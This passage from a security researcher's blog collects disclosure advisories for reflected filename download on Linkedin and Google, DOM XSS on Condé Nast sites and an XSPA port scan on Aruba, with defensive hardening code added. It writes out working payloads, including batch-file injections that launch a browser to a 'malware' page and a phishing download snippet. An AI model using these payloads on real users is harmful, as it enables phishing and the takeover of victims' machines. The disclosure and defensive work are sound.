David Sopas – Web Security Researcher


18/09/15 Advisories

Linkedin Reflected Filename Download


While researching another website, I noticed an XHR request to Linkedin in Google Chrome's inspector that seemed interesting:


Basically, it is the request websites make to count how many shares their site has on the Linkedin network.
As a curious security researcher, I tried to modify the url parameter to something more interesting:


Which returned:


The url parameter was not validated and was reflected in the JSON file.
If I downloaded the file and renamed it to .bat, it launched the Windows calculator.
But this was not enough: I needed to change the path so that a batch file is downloaded directly, and use a different Windows command.

https://www.linkedin.com/countserv/count/share;setup.bat?url="||start chrome websegura.net/malware.htm||

Guess what? IE8 automatically downloaded this batch file from a trusted domain – linkedin.com.
I wanted it to work in other browsers too, so I needed the HTML5 download attribute:

<div align="center"> 
<a href='https://www.linkedin.com/countserv/count/share;setup.bat?url="||start chrome websegura.net/malware.htm||' download="setup.bat" onclick="return false;">
<img src="http://damnlink.com/uploaded_images/godaddy_coupons_and_godaddy_promo_code_3187745288.png" border="0" /></a> 
<h1>Linkedin Premium account!</h1> 
<p><i>(Use "Save link as" to download the file)</i></p> 
</div>


So a possible attack scenario would be:

  1. Malicious user sends a link to the victim, as he would with a CSRF or XSS (phishing campaigns, social networks, instant messengers, posts, etc.)
  2. Victim clicks the link and, trusting where it came from (Linkedin), downloads the file
  3. Victim runs the file and his computer is hijacked

A malicious user could lend even more credibility to the HTML5 download page by chaining it with well-known open redirect vulnerabilities on trusted sites, such as open redirects on Google or even on Linkedin.

To the victim, the entire process looks like a file being offered for download from the original Linkedin site, and it would not raise any suspicion. A malicious user could gain complete control over a victim's computer and launch malicious files that appear to originate from a trusted party.

Malicious users are always searching for better ways of gaining victims' trust. This could be the right online weapon.

11-05-2015 Sent the report to Linkedin
11-05-2015 Linkedin didn't understand the true nature of the attack
11-05-2015 I replied with more information, citing other public RFD attacks and Oren Hafif's paper about RFD
13-05-2015 Linkedin told me that they're working on a solution
02-06-2015 I asked for an update
03-06-2015 Linkedin replied that they will give me an update soon
01-07-2015 I asked again for an update
09-09-2015 Linkedin replied that they had fixed the issue
18-09-2015 Full disclosure

16/09/15 Advisories

DOM XSS in all Condé Nast sites network


For those who don’t know Condé Nast:

Condé Nast, a division of Advance Publications, is a mass media company headquartered at One World Trade Center in New York City. The company attracts more than 164 million consumers across its 20 print and digital media brands: Allure, Architectural Digest, Ars Technica, Bon Appétit, Brides, Condé Nast Traveler, Details, Epicurious, Glamour, Golf Digest, Golf World, GQ, Lucky, The New Yorker, Self, Teen Vogue, Vanity Fair, Vogue, W and Wired.

A DOM XSS vulnerability in a specific ads page on newyorker.com made me realise that every website in their network was vulnerable if a user injected code into the URL.

The affected file was displayad.html in the ads directory:

<script type="text/javascript">
document.write('<script type="text/javascript" src="' + (location.search.split('req=')[1] || '') + '"></scr'+'ipt>');
</script>

The value taken from location.search.split is written into the page without any escaping or validation, so the "req" parameter could be manipulated at will, including pointing the script src at an attacker-controlled host.
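A hardened replacement for this kind of loader, added here as an example (it is not Condé Nast's code). Instead of splicing the raw "req" value into document.write, the value is parsed as a URL, checked against an allow-list of script origins, and attached with DOM APIs. The allow-list hosts and the function names are assumptions for illustration.

```javascript
// Added example (not Condé Nast's code): safe handling of a "req" parameter
// that names a script to load. The allow-list entries are constructed
// placeholders, not real ad hosts.
const ALLOWED_SCRIPT_ORIGINS = new Set([
  'https://ads.example-publisher.test',
  'https://cdn.example-adserver.test',
]);

// Parse a query string of the shape location.search ("?req=...") and return
// the script URL if it is safe to load, otherwise null.
function resolveAdScriptUrl(search, allowedOrigins = ALLOWED_SCRIPT_ORIGINS) {
  const params = new URLSearchParams(search);
  const req = params.get('req');
  if (!req) return null;

  let url;
  try {
    // No base URL is given on purpose: relative values, protocol-relative
    // "//host/x.js" and pseudo-schemes such as javascript: all fail to parse.
    url = new URL(req);
  } catch (e) {
    return null;
  }
  if (url.protocol !== 'https:') return null;          // no http:, data:, etc.
  if (url.username || url.password) return null;       // no "user:pw@host" tricks
  if (!allowedOrigins.has(url.origin)) return null;    // exact origin match only
  return url.href;
}

// Browser side: attach the script through the DOM rather than by building
// an HTML string. The src is assigned as a property, never concatenated.
function loadAdScript(search) {
  const src = resolveAdScriptUrl(search);
  if (!src) return false;
  const s = document.createElement('script');
  s.src = src;
  document.head.appendChild(s);
  return true;
}
```

The origin check is the important part: escaping alone would still let the page load any script the attacker hosts, because the injected value is a legitimate URL, not markup. A Content-Security-Policy `script-src` restricted to the same origins gives a second, independent line of defence.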



Other sites on the network:


Keep in mind that these sites bring in millions of users every day, and this vulnerability in the wrong hands would be very dangerous.
A malicious user could also:

  • Access other sites inside another client’s private intranet.
  • Steal another client’s cookie(s).
  • Modify another client’s cookie(s).
  • Steal another client’s submitted form data.
  • Modify another client’s submitted form data (before it reaches the server).
  • Submit a form to your application on the user's behalf which modifies passwords or other application data.

This was fixed by the Condé Nast security team, which kept me updated at every step, showing that it's a company that cares about security and its clients. I hope they can keep up the good work.

08-09-2015 Asked for a security contact
09-09-2015 First contact with the head of security of Condé Nast
10-09-2015 Sent the report
11-09-2015 Update received that they were clearing cache
14-09-2015 Problem solved
16-09-2015 Full disclosure

10/09/15 Advisories

Google Reflected Filename Download


I found a critical issue on Google that malicious users could use to hijack victims' computers, using a Google domain as the platform and as the source of trust.

I came across this security issue when I noticed, in Google Chrome's inspector, a JSON request made to the following URL:


After confirming that the callback variable was reflected in the response, I tried the following GET request:


Which returns the following JSON:

// API callback
{
  "error": {
    "errors": [
      {
        "domain": "usageLimits",
        "reason": "keyInvalid",
        "message": "Bad Request"
      }
    ],
    "code": 400,
    "message": "Bad Request"
  }
}

It returns HTTP status code 200 even though the JSON body says it's an error (?). In this case the callback parameter only allows a command without spaces to be executed, so in the following proof-of-concept I could execute calc on Windows.

But I wanted a better and more exploitable proof-of-concept, so I tried the query parameter, "q":


Which returned:

"title": "Google Custom Search - \"||start chrome davidsopas.com/poc/malware.htm||",
"searchTerms": "\"||start chrome davidsopas.com/poc/malware.htm||",

The payload is reflected. Because I couldn't control the filename and force a download, I needed to use the HTML5 download attribute vector, which is supported by the following browsers:

  • Chrome
  • Opera
  • Android Browser
  • Chrome for Android
  • Firefox

Online proof-of-concept (it downloads a batch file that opens a new Chrome window with a URL; in my PoC the page is just text):



This works on most Microsoft Windows versions. It can also be used on Linux and OS X, but it needs more user interaction. For a multi-platform attack, a malicious user could create a .htm file instead of a .bat file, with the HTML file itself being malicious. This might be an alternative attack method that works on all operating systems.

So in my proof-of-concept I was able to open a new Chrome window with a page that simulates malware [it's just text].

A malicious user could:

  1. Launch a malicious campaign with a specially crafted page offering Google deals – similar to my proof-of-concept
  2. Victim downloads the file, thinking that it comes from a trusted domain [googleapis.com]
  3. Malicious user gains control over the victim's machine

How to fix this issue?
Google has already fixed most issues of this kind by sending the HTTP header Content-Disposition: attachment; filename="f.txt", which forces the download to be saved as f.txt every time. But this time they decided not to fix it, because they say it requires too much user interaction.
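The Content-Disposition fix described above, applied to a JSON/JSONP endpoint of the kind both the Linkedin share-count advisory and this Google custom-search advisory describe. This is an added example and not Google's or Linkedin's code; the handler helper, its return shape and the callback rule are assumptions about how such an endpoint could be written.

```javascript
// Added example (not Google's or Linkedin's code): serve a JSON / JSONP
// response so that a reflected parameter cannot turn it into an executable
// download or inject code into the callback position.

// A JSONP callback must be a plain (optionally dotted) JavaScript identifier.
// Anything else, including a '"||start ...||' payload, is refused.
const CALLBACK_RE = /^[A-Za-z_$][\w$]*(\.[A-Za-z_$][\w$]*)*$/;

function isSafeCallback(name) {
  return typeof name === 'string' && name.length <= 64 && CALLBACK_RE.test(name);
}

// Build the response for an endpoint whose body reflects user input.
// `payload` is the object to serialise; `callback` is the untrusted callback
// parameter (undefined when the client asked for plain JSON).
// Returns { status, headers, body } for a framework to send.
function buildJsonResponse(payload, callback) {
  const headers = {
    // Fixed filename: a ";setup.bat" path segment or an HTML5 download
    // attribute can no longer choose the extension of the saved file.
    'Content-Disposition': 'attachment; filename="f.txt"',
    // Stop browsers from sniffing the body into HTML or script.
    'X-Content-Type-Options': 'nosniff',
  };

  if (callback === undefined) {
    headers['Content-Type'] = 'application/json; charset=utf-8';
    return { status: 200, headers, body: JSON.stringify(payload) };
  }

  if (!isSafeCallback(callback)) {
    headers['Content-Type'] = 'application/json; charset=utf-8';
    return { status: 400, headers, body: JSON.stringify({ error: 'invalid callback' }) };
  }

  headers['Content-Type'] = 'application/javascript; charset=utf-8';
  // The leading comment stops the response from being usable as something
  // other than a script, and U+2028/U+2029 are escaped so the serialised
  // JSON stays valid inside JavaScript source.
  const json = JSON.stringify(payload)
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
  return { status: 200, headers, body: '/**/' + callback + '(' + json + ');' };
}
```

Browsers honour Content-Disposition: attachment only for navigations, not for `<script src>` subresource loads, which is why an API can send it on every response without breaking JSONP consumers. The reflected search term in the body is untouched; the fix works because the saved file can only ever be f.txt.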

08/08/15 Advisories

ArubaNetworks Avatar Image XSPA


I found out that it was possible to run an XSPA [Cross Site Port Attack] through the Avatar URL option on any registered community profile.
XSPA allows attackers to abuse functionality available in most web applications to port scan intranet and external Internet-facing servers.
An application is vulnerable to Cross Site Port Attacks if it processes user-supplied URLs and does not verify/sanitize the backend response received from the server.

In this type of attack I always use Nmap's test machine, scanme.nmap.org, to check which ports are open on the server.
Using Nmap on my own machine I tested 3 ports on scanme.nmap.org:

80/tcp open http
81/tcp closed http
443/tcp closed https

I then entered the following external URL in my Avatar web option – https://community.arubanetworks.com/t5/user/myprofilepage/tab/user-icons%3Aexternal:

No server error.

I modified it to:

And then to:

The following errors were returned:

http://scanme.nmap.org:81 – GET http://scanme.nmap.org:81/ net::ERR_CONNECTION_REFUSED

http://scanme.nmap.org:443 – GET http://scanme.nmap.org:443/ net::ERR_CONNECTION_REFUSED

You can even check that the port is stored in the avatar HTML:

<img id="display" class="lia-user-avatar-message" title="dsopas" src="http://scanme.nmap.org:443/" alt="dsopas" />


The Aruba security team has already fixed this issue, so I decided to share it with you guys.
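Server-side validation of a user-supplied avatar URL before the application fetches it, added here as an example (it is not Aruba's code). It rejects exactly the knobs the port scan above turned: an explicit port, a non-HTTP scheme, credentials in the URL, and literal private or loopback addresses. The function name, return shape and reason strings are assumptions.

```javascript
// Added example (not Aruba's code): checks for a user-supplied avatar URL.
// Node's WHATWG URL parser normalises the host, so decimal or hex forms of
// an IPv4 address arrive here already in dotted form.

const IPV4_RE = /^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$/;

// Loopback, RFC 1918, link-local and "this network" ranges.
function isPrivateIPv4(host) {
  const m = IPV4_RE.exec(host);
  if (!m) return false;
  const a = Number(m[1]);
  const b = Number(m[2]);
  return a === 10 || a === 127 || a === 0 ||
    (a === 172 && b >= 16 && b <= 31) ||
    (a === 192 && b === 168) ||
    (a === 169 && b === 254);
}

// Loopback, unspecified, unique-local, link-local and IPv4-mapped IPv6.
function isPrivateIPv6(host) {
  const h = host.toLowerCase();
  return h === '::1' || h === '::' ||
    h.startsWith('fc') || h.startsWith('fd') ||
    h.startsWith('fe80') || h.startsWith('::ffff:');
}

// Returns { ok: true, url } when the URL may be fetched,
// otherwise { ok: false, reason }.
function validateAvatarUrl(raw) {
  let url;
  try {
    url = new URL(raw);
  } catch (e) {
    return { ok: false, reason: 'not a URL' };
  }
  if (url.protocol !== 'http:' && url.protocol !== 'https:') {
    return { ok: false, reason: 'scheme not allowed' };
  }
  // url.port is '' for the scheme's default port; anything else is a probe.
  if (url.port !== '') {
    return { ok: false, reason: 'explicit port not allowed' };
  }
  if (url.username || url.password) {
    return { ok: false, reason: 'credentials not allowed' };
  }
  // IPv6 hostnames come back bracketed from the parser.
  const host = url.hostname.replace(/^\[|\]$/g, '');
  if (host.includes(':') ? isPrivateIPv6(host) : isPrivateIPv4(host)) {
    return { ok: false, reason: 'private address' };
  }
  if (host === 'localhost' || host.endsWith('.localhost')) {
    return { ok: false, reason: 'private address' };
  }
  return { ok: true, url: url.href };
}
```

Two caveats a practitioner would add. A hostname that resolves to a private address passes this check, so the resolved address must be re-checked at connect time (and the fetch made from a host with no route to the intranet); and whatever the fetch returns, the user should see one generic message, since the distinct "connection refused" versus "no error" outcomes are exactly what turned this feature into a port scanner.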

03/08/15 Advisories

Desk.com Reflected Filename Download


Who is Desk.com?

Salesforce Desk.com help desk software offers small businesses an all-in-one customer service software solution that will help keep customers happy and loyal. Desk.com can be set up in just hours, and provides multi-channel support, including phone, email, self-help pages, and social media. Not only will this innovative help desk software let your agents more easily serve customers, your small business will have the insights needed to build better products and make smarter, growth-driving decisions.

– in http://www.salesforce.com/desk/overview/

Who uses Desk.com?
